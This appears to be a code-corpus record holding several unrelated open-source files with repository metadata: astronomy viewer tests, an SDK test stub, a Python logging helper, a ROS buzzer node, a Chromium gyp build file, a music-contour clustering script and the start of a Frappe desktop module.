assert self.viewer.label_mouseover.pixel == 'x=01.0 y=-0.0'
assert self.viewer.label_mouseover.value == '+1.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
def test_wcslink_fullblown(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, wcs_use_affine=False,
error_on_fail=True)
links = self.imviz.app.data_collection.external_links
assert len(links) == 1
assert isinstance(links[0], WCSLink)
assert self.viewer.get_link_type('has_wcs_1[SCI,1]') == 'self'
assert self.viewer.get_link_type('has_wcs_2[SCI,1]') == 'wcs'
# Also test other exception handling here.
def test_invalid_inputs(self):
with pytest.raises(ValueError, match='link_type'):
self.imviz.link_data(link_type='foo')
with pytest.raises(ValueError, match='wcs_fallback_scheme'):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme='foo')
with pytest.raises(ValueError, match='not found in data collection external links'):
self.viewer.get_link_type('foo')
def test_imviz_no_data(imviz_app):
with pytest.raises(ValueError, match='No valid reference data'):
get_reference_image_data(imviz_app.app)
imviz_app.link_data(error_on_fail=True) # Just no-op, do not crash
links = imviz_app.app.data_collection.external_links
assert len(links) == 0
with pytest.raises(ValueError, match='No reference data for link look-up'):
imviz_app.default_viewer.get_link_type('foo')
| 45.666667
| 96
| 0.659932
|
f7294b4c8ab15cf32eb5a8981f5001dc4da902e2
| 879
|
py
|
Python
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_9_0_0/test/test_network_pools.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_9_0_0
from isi_sdk_9_0_0.models.network_pools import NetworkPools # noqa: E501
from isi_sdk_9_0_0.rest import ApiException
class TestNetworkPools(unittest.TestCase):
"""NetworkPools unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNetworkPools(self):
"""Test NetworkPools"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_9_0_0.models.network_pools.NetworkPools() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 21.439024
| 81
| 0.697383
|
86f7961555d78ca0ddb6cd92b59fd0248fe8bc7a
| 6,102
|
py
|
Python
|
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
phk_logger/phkLogger.py
|
proh4cktive/phk-logger
|
e4425124d86ff8fe74e05e2243af4f0ee366a1ca
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import errno
import platform
import logging
import logging.handlers
class PHKLogger(object):
"""Simple Logging class
Allow to log to standard syslog process or specific file if set
"""
def __init__(self, filename=None, level=logging.WARNING, name=None, cli=False, backup=3, when="midnight", pattern=None):
if name is None:
name = __name__
try:
self.level = int(level)
except ValueError:
self.level = logging.INFO
self.logger = logging.getLogger(name)
# Default behavior
if filename is None:
# Set syslog handler
current = platform.system()
if current == 'Linux':
target = '/dev/log'
elif current == 'Darwin':
target = '/var/run/syslog'
else:
raise NotImplementedError('Sorry unsupported plateform.')
handler = logging.handlers.SysLogHandler(target)
# If filename is set
else:
try:
# Create directory if needed
dirname = os.path.dirname(filename)
if dirname and not os.path.isdir(dirname):
os.makedirs(dirname)
# Create file if needed
if not os.path.isfile(filename):
with open(filename, 'wt') as tmp:
pass
except OSError as err:
raise Exception(err)
try:
# Set a time rotating handler
handler = logging.handlers.TimedRotatingFileHandler(filename, when=when, backupCount=backup)
except IOError:
raise Exception('Unable to set Time Rotating Log file: {f}'.format(f=filename))
if pattern is None:
pattern = '%(name)s %(asctime)s %(levelname)-8s %(message)s'
formatter = logging.Formatter(pattern)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(self.level)
self.cli = cli
def __is_string(self, string):
try:
return isinstance(string, str)
except NameError:
return isinstance(string, basestring)
def debug(self, msg, color=None, light=None):
"""Shortcut to debug message
"""
self.write(msg, level=logging.DEBUG, color=color, light=light)
def info(self, msg, color=None, light=None):
"""Shortcut to info message
"""
self.write(msg, level=logging.INFO, color=color, light=light)
def warning(self, msg, color=None, light=None):
"""Shortcut to warning message
"""
self.write(msg, level=logging.WARNING, color=color, light=light)
def error(self, msg, color=None, light=None):
"""Shortcut to error message
"""
self.write(msg, level=logging.ERROR, color=color, light=light)
def critical(self, msg, color=None, light=None):
"""Shortcut to critical message
"""
self.write(msg, level=logging.CRITICAL, color=color, light=light)
def write(self, message, level=None, color=None, light=None):
"""Accept log message with level set with string or logging int
"""
# Clean message
message = str(message).rstrip()
# Only log if there is a message (not just a new line)
if message == "":
return True
# Autoset level if necessary
if level is None:
level = self.level
# Convert string level to logging int
if self.__is_string(level):
level = level.upper()
if level == "DEBUG":
level = logging.DEBUG
elif level in ["INFO", "INFOS"]:
level = logging.INFO
elif level == "WARNING":
level = logging.WARNING
elif level == "ERROR":
level = logging.ERROR
elif level == "CRITICAL":
level = logging.CRITICAL
else:
level = self.level
# Output to with correct level
if level == logging.DEBUG:
def_color = "BLUE"
def_light = True
prefix = '*'
self.logger.debug(message)
elif level == logging.INFO:
def_color = "GREEN"
def_light = False
prefix = '+'
self.logger.info(message)
elif level == logging.WARNING:
def_color = "YELLOW"
def_light = False
prefix = '-'
self.logger.warning(message)
elif level == logging.ERROR:
def_color = "RED"
def_light = False
prefix = '!'
self.logger.error(message)
elif level == logging.CRITICAL:
def_color = "RED"
def_light = True
prefix = '!'
self.logger.critical(message)
else:
raise Exception('Invalid log level')
if color is None:
color = def_color
if light is None:
light = def_light
# Output to CLI if cli flag is set
if self.cli:
color = color.upper()
# Position color based on level if not forced
c = '\033[1' if light else '\033[0'
if color == 'BLACK':
c += ';30m'
elif color == 'BLUE':
c += ';34m'
elif color == 'GREEN':
c += ';32m'
elif color == 'CYAN':
c += ';36m'
elif color == 'RED':
c += ';31m'
elif color == 'PURPLE':
c += ';35m'
elif color == 'YELLOW':
c += ';33m'
elif color == 'WHITE':
c += ';37m'
else:
# No Color
c += 'm'
if level >= self.level:
sys.stdout.write("{color}[{p}] {msg}\033[0m\n".format(color=c, p=prefix, msg=message))
| 31.78125
| 124
| 0.51393
|
eedeae9e19234d927155d28128243d5e05b225f5
| 1,139
|
py
|
Python
|
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/buzzer.py
|
sugarman1983/pimouse_ros
|
3d0351d225e69fbcde4525a941a1e303b791066c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy, actionlib
from std_msgs.msg import UInt16
from pimouse_ros.msg import MusicAction, MusicResult, MusicFeedback
def write_freq(hz=0):
bfile = "/dev/rtbuzzer0"
try:
with open(bfile, "w") as f:
f.write(str(hz) + "\n")
except IOError:
rospy.logerr("can't write to " + bfile)
def recv_buzzer(data):
write_freq(data.data)
def exec_music(goal):
r = MusicResult()
fb = MusicFeedback()
for i, f in enumerate(goal.freqs):
fb.remaining_steps = len(goal.freqs) - i
music.publish_feedback(fb)
if music.is_preempt_requested():
write_freq(0)
r.finished = False
music.set_preempted(r)
return
write_freq(f)
rospy.sleep(1.0 if i >= len(goal.durations) else goal.durations[i])
r.finished = True
music.set_succeeded(r)
if __name__== '__main__':
rospy.init_node('buzzer')
rospy.Subscriber("buzzer", UInt16, recv_buzzer)
music = actionlib.SimpleActionServer('music', MusicAction, exec_music, False)
music.start()
rospy.on_shutdown(write_freq)
rospy.spin()
| 25.886364
| 81
| 0.647059
|
2fdd75616b3fd8572572c958aa8dcfbd99a11dc2
| 16,854
|
gyp
|
Python
|
ui/gfx/gfx.gyp
|
iplo/Chain
|
8bc8943d66285d5258fffc41bed7c840516c4422
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 231
|
2015-01-08T09:04:44.000Z
|
2021-12-30T03:03:10.000Z
|
ui/gfx/gfx.gyp
|
JasonEric/chromium
|
c7361d39be8abd1574e6ce8957c8dbddd4c6ccf7
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2017-02-14T21:55:58.000Z
|
2017-02-14T21:55:58.000Z
|
ui/gfx/gfx.gyp
|
JasonEric/chromium
|
c7361d39be8abd1574e6ce8957c8dbddd4c6ccf7
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 268
|
2015-01-21T05:53:28.000Z
|
2022-03-25T22:09:01.000Z
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'gfx_geometry',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'geometry/box_f.cc',
'geometry/box_f.h',
'geometry/cubic_bezier.h',
'geometry/cubic_bezier.cc',
'geometry/insets.cc',
'geometry/insets.h',
'geometry/insets_base.h',
'geometry/insets_f.cc',
'geometry/insets_f.h',
'geometry/matrix3_f.cc',
'geometry/matrix3_f.h',
'geometry/point.cc',
'geometry/point.h',
'geometry/point3_f.cc',
'geometry/point3_f.h',
'geometry/point_base.h',
'geometry/point_conversions.cc',
'geometry/point_conversions.h',
'geometry/point_f.cc',
'geometry/point_f.h',
'geometry/quad_f.cc',
'geometry/quad_f.h',
'geometry/rect.cc',
'geometry/rect.h',
'geometry/rect_base.h',
'geometry/rect_base_impl.h',
'geometry/rect_conversions.cc',
'geometry/rect_conversions.h',
'geometry/rect_f.cc',
'geometry/rect_f.h',
'geometry/safe_integer_conversions.h',
'geometry/size.cc',
'geometry/size.h',
'geometry/size_base.h',
'geometry/size_conversions.cc',
'geometry/size_conversions.h',
'geometry/size_f.cc',
'geometry/size_f.h',
'geometry/vector2d.cc',
'geometry/vector2d.h',
'geometry/vector2d_conversions.cc',
'geometry/vector2d_conversions.h',
'geometry/vector2d_f.cc',
'geometry/vector2d_f.h',
'geometry/vector3d_f.cc',
'geometry/vector3d_f.h',
],
},
# TODO(beng): This should either generate its own executable or be part of
# a gfx_unittests executable. Currently it's built as part of
# ui_unittests.
{
'target_name': 'gfx_geometry_unittests',
'type': 'static_library',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:test_support_base',
'<(DEPTH)/testing/gtest.gyp:gtest',
'gfx_geometry',
],
'sources': [
'geometry/box_unittest.cc',
'geometry/cubic_bezier_unittest.cc',
'geometry/insets_unittest.cc',
'geometry/matrix3_unittest.cc',
'geometry/point_unittest.cc',
'geometry/point3_unittest.cc',
'geometry/quad_unittest.cc',
'geometry/rect_unittest.cc',
'geometry/safe_integer_conversions_unittest.cc',
'geometry/size_unittest.cc',
'geometry/vector2d_unittest.cc',
'geometry/vector3d_unittest.cc',
],
},
{
'target_name': 'gfx',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:base_i18n',
'<(DEPTH)/base/base.gyp:base_static',
'<(DEPTH)/base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
'<(DEPTH)/third_party/libpng/libpng.gyp:libpng',
'<(DEPTH)/third_party/zlib/zlib.gyp:zlib',
'gfx_geometry',
],
# text_elider.h includes ICU headers.
'export_dependent_settings': [
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'android/device_display_info.cc',
'android/device_display_info.h',
'android/gfx_jni_registrar.cc',
'android/gfx_jni_registrar.h',
'android/java_bitmap.cc',
'android/java_bitmap.h',
'android/shared_device_display_info.cc',
'android/shared_device_display_info.h',
'android/view_configuration.cc',
'android/view_configuration.h',
'animation/animation.cc',
'animation/animation.h',
'animation/animation_container.cc',
'animation/animation_container.h',
'animation/animation_container_element.h',
'animation/animation_container_observer.h',
'animation/animation_delegate.h',
'animation/linear_animation.cc',
'animation/linear_animation.h',
'animation/multi_animation.cc',
'animation/multi_animation.h',
'animation/slide_animation.cc',
'animation/slide_animation.h',
'animation/throb_animation.cc',
'animation/throb_animation.h',
'animation/tween.cc',
'animation/tween.h',
'blit.cc',
'blit.h',
'break_list.h',
'canvas.cc',
'canvas.h',
'canvas_android.cc',
'canvas_paint_gtk.cc',
'canvas_paint_gtk.h',
'canvas_paint_mac.h',
'canvas_paint_mac.mm',
'canvas_paint_win.cc',
'canvas_paint_win.h',
'canvas_skia.cc',
'canvas_skia_paint.h',
'codec/jpeg_codec.cc',
'codec/jpeg_codec.h',
'codec/png_codec.cc',
'codec/png_codec.h',
'color_analysis.cc',
'color_analysis.h',
'color_profile.cc',
'color_profile.h',
'color_profile_mac.cc',
'color_profile_win.cc',
'color_utils.cc',
'color_utils.h',
'display.cc',
'display.h',
'display_observer.cc',
'display_observer.h',
'favicon_size.cc',
'favicon_size.h',
'font.cc',
'font.h',
'font_fallback_win.cc',
'font_fallback_win.h',
'font_list.cc',
'font_list.h',
'font_list_impl.cc',
'font_list_impl.h',
'font_render_params_android.cc',
'font_render_params_linux.cc',
'font_render_params_linux.h',
'font_smoothing_win.cc',
'font_smoothing_win.h',
'frame_time.h',
'gfx_export.h',
'gfx_paths.cc',
'gfx_paths.h',
'gpu_memory_buffer.cc',
'gpu_memory_buffer.h',
'image/canvas_image_source.cc',
'image/canvas_image_source.h',
'image/image.cc',
'image/image.h',
'image/image_family.cc',
'image/image_family.h',
'image/image_ios.mm',
'image/image_mac.mm',
'image/image_png_rep.cc',
'image/image_png_rep.h',
'image/image_skia.cc',
'image/image_skia.h',
'image/image_skia_operations.cc',
'image/image_skia_operations.h',
'image/image_skia_rep.cc',
'image/image_skia_rep.h',
'image/image_skia_source.h',
'image/image_skia_util_ios.h',
'image/image_skia_util_ios.mm',
'image/image_skia_util_mac.h',
'image/image_skia_util_mac.mm',
'image/image_util.cc',
'image/image_util.h',
'image/image_util_ios.mm',
'interpolated_transform.cc',
'interpolated_transform.h',
'linux_font_delegate.cc',
'linux_font_delegate.h',
'mac/scoped_ns_disable_screen_updates.h',
'native_widget_types.h',
'nine_image_painter.cc',
'nine_image_painter.h',
'ozone/dri/dri_skbitmap.cc',
'ozone/dri/dri_skbitmap.h',
'ozone/dri/dri_surface.cc',
'ozone/dri/dri_surface.h',
'ozone/dri/dri_surface_factory.cc',
'ozone/dri/dri_surface_factory.h',
'ozone/dri/dri_vsync_provider.cc',
'ozone/dri/dri_vsync_provider.h',
'ozone/dri/dri_wrapper.cc',
'ozone/dri/dri_wrapper.h',
'ozone/dri/hardware_display_controller.cc',
'ozone/dri/hardware_display_controller.h',
'ozone/impl/file_surface_factory.cc',
'ozone/impl/file_surface_factory.h',
'ozone/surface_factory_ozone.cc',
'ozone/surface_factory_ozone.h',
'pango_util.cc',
'pango_util.h',
'path.cc',
'path.h',
'path_aura.cc',
'path_gtk.cc',
'path_win.cc',
'path_win.h',
'path_x11.cc',
'path_x11.h',
'platform_font.h',
'platform_font_android.cc',
'platform_font_ios.h',
'platform_font_ios.mm',
'platform_font_mac.h',
'platform_font_mac.mm',
'platform_font_ozone.cc',
'platform_font_pango.cc',
'platform_font_pango.h',
'platform_font_win.cc',
'platform_font_win.h',
'range/range.cc',
'range/range.h',
'range/range_mac.mm',
'range/range_win.cc',
'render_text.cc',
'render_text.h',
'render_text_mac.cc',
'render_text_mac.h',
'render_text_ozone.cc',
'render_text_pango.cc',
'render_text_pango.h',
'render_text_win.cc',
'render_text_win.h',
'scoped_canvas.h',
'scoped_cg_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.mm',
'scoped_ui_graphics_push_context_ios.h',
'scoped_ui_graphics_push_context_ios.mm',
'screen.cc',
'screen.h',
'screen_android.cc',
'screen_aura.cc',
'screen_gtk.cc',
'screen_ios.mm',
'screen_mac.mm',
'screen_win.cc',
'screen_win.h',
'scrollbar_size.cc',
'scrollbar_size.h',
'selection_model.cc',
'selection_model.h',
'sequential_id_generator.cc',
'sequential_id_generator.h',
'shadow_value.cc',
'shadow_value.h',
'skbitmap_operations.cc',
'skbitmap_operations.h',
'skia_util.cc',
'skia_util.h',
'skia_utils_gtk.cc',
'skia_utils_gtk.h',
'switches.cc',
'switches.h',
'sys_color_change_listener.cc',
'sys_color_change_listener.h',
'text_constants.h',
'text_elider.cc',
'text_elider.h',
'text_utils.cc',
'text_utils.h',
'text_utils_android.cc',
'text_utils_ios.mm',
'text_utils_skia.cc',
'transform.cc',
'transform.h',
'transform_util.cc',
'transform_util.h',
'ui_gfx_exports.cc',
'utf16_indexing.cc',
'utf16_indexing.h',
'vsync_provider.h',
'win/dpi.cc',
'win/dpi.h',
'win/hwnd_util.cc',
'win/hwnd_util.h',
'win/scoped_set_map_mode.h',
'win/singleton_hwnd.cc',
'win/singleton_hwnd.h',
'win/window_impl.cc',
'win/window_impl.h',
'x/x11_atom_cache.cc',
'x/x11_atom_cache.h',
'x/x11_types.cc',
'x/x11_types.h',
],
'conditions': [
['OS=="ios"', {
# iOS only uses a subset of UI.
'sources/': [
['exclude', '^codec/jpeg_codec\\.cc$'],
],
}, {
'dependencies': [
'<(libjpeg_gyp_path):libjpeg',
],
}],
# TODO(asvitkine): Switch all platforms to use canvas_skia.cc.
# http://crbug.com/105550
['use_canvas_skia==1', {
'sources!': [
'canvas_android.cc',
],
}, { # use_canvas_skia!=1
'sources!': [
'canvas_skia.cc',
],
}],
['toolkit_uses_gtk == 1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:gtk',
],
'sources': [
'gtk_native_view_id_manager.cc',
'gtk_native_view_id_manager.h',
'gtk_preserve_window.cc',
'gtk_preserve_window.h',
'gdk_compat.h',
'gtk_compat.h',
'gtk_util.cc',
'gtk_util.h',
'image/cairo_cached_surface.cc',
'image/cairo_cached_surface.h',
'scoped_gobject.h',
],
}],
['OS=="win"', {
'sources': [
'gdi_util.cc',
'gdi_util.h',
'icon_util.cc',
'icon_util.h',
],
# TODO(jschuh): C4267: http://crbug.com/167187 size_t -> int
# C4324 is structure was padded due to __declspec(align()), which is
# uninteresting.
'msvs_disabled_warnings': [ 4267, 4324 ],
}],
['OS=="android"', {
'sources!': [
'animation/throb_animation.cc',
'display_observer.cc',
'selection_model.cc',
],
'dependencies': [
'gfx_jni_headers',
],
'link_settings': {
'libraries': [
'-landroid',
'-ljnigraphics',
],
},
}],
['use_aura==0', {
'sources!': [
'nine_image_painter.cc',
'nine_image_painter.h',
],
}],
['OS=="android" and use_aura==0', {
'sources!': [
'path.cc',
],
}],
['OS=="android" and use_aura==1', {
'sources!': [
'screen_android.cc',
],
}],
['OS=="android" and android_webview_build==0', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base_java',
],
}],
['OS=="android" or OS=="ios"', {
'sources!': [
'render_text.cc',
'render_text.h',
'text_utils_skia.cc',
],
}],
['use_x11==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:x11',
],
}],
['use_pango==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:pangocairo',
],
'sources!': [
'platform_font_ozone.cc',
'render_text_ozone.cc',
],
}],
['ozone_platform_dri==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:dridrm',
],
}],
['desktop_linux==1 or chromeos==1', {
'dependencies': [
# font_render_params_linux.cc uses fontconfig
'<(DEPTH)/build/linux/system.gyp:fontconfig',
],
}],
],
'target_conditions': [
# Need 'target_conditions' to override default filename_rules to include
# the file on iOS.
['OS == "ios"', {
'sources/': [
['include', '^scoped_cg_context_save_gstate_mac\\.h$'],
],
}],
],
},
{
'target_name': 'gfx_test_support',
'sources': [
'test/gfx_util.cc',
'test/gfx_util.h',
'test/ui_cocoa_test_helper.h',
'test/ui_cocoa_test_helper.mm',
],
'dependencies': [
'../../base/base.gyp:base',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
],
'conditions': [
['OS == "mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
],
},
}],
['OS!="ios"', {
'type': 'static_library',
}, { # OS=="ios"
# None of the sources in this target are built on iOS, resulting in
# link errors when building targets that depend on this target
# because the static library isn't found. If this target is changed
# to have sources that are built on iOS, the target should be changed
# to be of type static_library on all platforms.
'type': 'none',
# The cocoa files don't apply to iOS.
'sources/': [
['exclude', 'cocoa']
],
}],
],
},
{
'target_name': 'gfx_unittests',
'type': 'executable',
'sources': [
'range/range_unittest.cc',
],
'dependencies': [
'../../base/base.gyp:run_all_unittests',
'../../testing/gtest.gyp:gtest',
'gfx',
],
}
],
'conditions': [
['OS=="android"' , {
'targets': [
{
'target_name': 'gfx_jni_headers',
'type': 'none',
'sources': [
'../android/java/src/org/chromium/ui/gfx/BitmapHelper.java',
'../android/java/src/org/chromium/ui/gfx/DeviceDisplayInfo.java',
'../android/java/src/org/chromium/ui/gfx/ViewConfigurationHelper.java',
],
'variables': {
'jni_gen_package': 'ui/gfx',
'jni_generator_ptr_type': 'long'
},
'includes': [ '../../build/jni_generator.gypi' ],
},
],
}],
],
}
| 30.868132
| 100
| 0.531209
|
0cd77719898d4dbea322e0f95736775a7565402f
| 6,433
|
py
|
Python
|
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | 2
|
2017-04-07T19:42:27.000Z
|
2017-06-26T01:38:44.000Z
|
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | null | null | null |
experiment-scripts/analyze_contours.py
|
rabitt/icassp-2017-world-music
|
8b1e17842b929bfd334f09a136fa9e297117b695
|
[
"MIT"
] | null | null | null |
"""Contour dictionary learning and singing clusters"""
import numpy as np
import pandas as pd
import pickle
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import spherical_kmeans
import interactive_plot
def align_metadata(contour_files, meta_file):
'''Align metadata to correspond to the order the contour files were processed.
Parameters
----------
contour_files : np.array
List of file names corresponding to each contour.
meta_file : str
Path to a file containing metadata for each recording.
Returns
-------
df : pd.DataFrame
Metadata for the whole dataset ordered in the same way as the contour files.
'''
df = pd.read_csv(meta_file)
uniq_files = np.unique(contour_files)
inds = []
for uniq_file in uniq_files:
inds.append(np.where(df['Csv']==uniq_file)[0][0])
inds = np.array(inds)
df = df.iloc[inds, :].reset_index()
return df
def dictionary_learning(X):
'''Apply spherical Kmeans to learn a dictionary of contour features and
return the cluster encoding.
Parameters
----------
X : np.array
The dataset of countour features (n_samples, n_features).
Returns
-------
embed_matrix : np.array
Spherical K means projection using linear encoding.
'''
# preprocessing
X = StandardScaler().fit_transform(X) # scaling
X = PCA(whiten=True).fit_transform(X) # whitening
# spherical Kmeans for dictionary learning
centroids = spherical_kmeans.spherical_kmeans(X, 100, num_iterations=200)
embed_matrix = spherical_kmeans.encode_linear(X, centroids)
return embed_matrix
def histogram_activations(embed_matrix, contour_files):
'''Compute a histogram of kmeans activations for each recording.
Parameters
----------
embed_matrix : np.array
Spherical K means projection.
contour_files : np.array
List of file names corresponding to each contour.
Returns
-------
hist_activations : np.array
Histogram of activations for each recording.
'''
uniq_files = np.unique(contour_files)
histograms = []
for uniq_file in uniq_files:
inds = np.where(contour_files == uniq_file)[0]
hist = np.sum(embed_matrix[inds, :], axis=0)
histograms.append((hist-hist.mean()) / hist.std()) # standardize histogram
hist_activations = np.array(histograms)
return hist_activations
def silhouette_K(X, min_ncl=5, max_ncl=20, metric='euclidean'):
'''Run K-means clustering for K in range [min_ncl, max_ncl] and return the
average silhouette score and the number of clusters K with the highest score.
Parameters
----------
X : np.array
The data to be clustered
min_ncl : int
The minimum number of clusters to consider.
max_ncl : int
The maximum number of clusters to consider.
metric : str
The distance metric used in the estimation of the silhouette score,
choice between 'euclidean', 'cosine', 'mahalanobis' etc.
Returns
-------
best_K : int
The K number of clusters with highest silhouette score
average_silhouette : np.array
The average silhouette score for each K in the range [0, max_ncl],
nan values added for K < min_ncl.
'''
average_silhouette = []
for i in range(min_ncl):
average_silhouette.append(np.nan)
for ncl in range(min_ncl, max_ncl):
cl_pred = KMeans(n_clusters=ncl, random_state=50).fit_predict(X)
average_silhouette.append(silhouette_score(X, cl_pred, metric=metric))
average_silhouette = np.array(average_silhouette)
best_K = np.nanargmax(average_silhouette)
return best_K, average_silhouette
def create_clusters(data, K=None):
'''Find the optimal K number of clusters using silhouette score and predict
cluster assignment for each sample in the data.
Parameters
----------
data : np.array
The dataset of learned features (n_samples, n_features).
K : int
The number K of clusters.
Returns
-------
cluster_pred : np.array
Cluster assignment for each sample in the data.
'''
if K is None:
K, _ = silhouette_K(data, min_ncl=5, max_ncl=20)
model = KMeans(n_clusters=K, random_state=50).fit(data)
cluster_pred = model.predict(data)
return cluster_pred
def fit_TSNE(data):
'''Fit 2D-TSNE embedding to be able to visualize the high-dimensional data.
Parameters
----------
data : np.array
The dataset of learned features (n_samples, n_features).
Returns
-------
xy_coords : np.array
The 2D coordinates learned by TSNE.
'''
model2D = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
xy_coords = model2D.fit_transform(data)
return xy_coords
def main(pickle_file, meta_file, html_file=None):
'''Steps through the analysis of contour features for dictionary learning
and singing style cluster extraction.
Parameters
----------
pickle_file : str
Path to pickle file with precomputed contour features.
meta_file : str
Path to csv file with metadata for each recording.
html_file : str
Path to html file to store the interactive TSNE visualization.
'''
# load precomputed contour features
contour_features, contour_files = pickle.load(open(pickle_file, 'rb'))
df = align_metadata(contour_files, meta_file)
embed_matrix = dictionary_learning(contour_features)
hist_activations = histogram_activations(embed_matrix, contour_files)
cluster_pred = create_clusters(hist_activations, K=9)
xy_coords = fit_TSNE(hist_activations)
if html_file is not None:
interactive_plot.plot_2D_scatter(xy_coords[:, 0], xy_coords[:, 1],
labels=cluster_pred, df=df, html_file=html_file)
if __name__ == "__main__":
pickle_file = '../data/contour_data.pickle'
meta_file = '../data/metadata.csv'
#html_file = '../data/TSNE.html'
html_file = None
main(pickle_file, meta_file, html_file)
| 31.077295
| 85
| 0.665475
|
8b5260d1b86474693562e2e30676b4d40c383db2
| 248
|
py
|
Python
|
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
wheerd/cloudformation-to-terraform
|
5411b33293e1f7d7673bb5d4cb52ff0537240db3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Dummy conftest.py for cloudformation_to_terraform.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
# import pytest
| 22.545455
| 60
| 0.677419
|
94a38a5304f8f9dba1e4817302e55f9171e6ac5e
| 16,082
|
py
|
Python
|
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | null | null | null |
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | null | null | null |
frappe/desk/desktop.py
|
finaxar/frappe
|
6da30361813c5de267889ef4970c323c626c02a3
|
[
"MIT"
] | 1
|
2020-09-03T18:16:50.000Z
|
2020-09-03T18:16:50.000Z
|
# Copyright (c) 2020, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Author - Shivam Mishra <shivam@frappe.io>
from __future__ import unicode_literals
import frappe
from json import loads, dumps
from frappe import _, DoesNotExistError, ValidationError, _dict
from frappe.boot import get_allowed_pages, get_allowed_reports
from six import string_types
from functools import wraps
from frappe.cache_manager import (
build_domain_restriced_doctype_cache,
build_domain_restriced_page_cache,
build_table_count_cache
)
def handle_not_exist(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
try:
return fn(*args, **kwargs)
except DoesNotExistError:
if frappe.message_log:
frappe.message_log.pop()
return []
